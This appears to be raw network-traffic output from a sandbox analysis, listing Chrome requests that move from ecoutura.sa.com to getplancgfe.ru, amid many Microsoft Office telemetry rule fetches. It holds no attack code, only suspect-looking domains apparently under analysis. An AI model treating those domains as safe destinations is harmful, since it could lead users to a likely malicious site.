    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ecoutura.sa.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ecoutura.sa.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: getplancgfe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://ecoutura.sa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: getplancgfe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getplancgfe.ru//Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.3.0/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://getplancgfe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://getplancgfe.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: getplancgfe.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://getplancgfe.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://getplancgfe.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: getplancgfe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getplancgfe.ru//Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
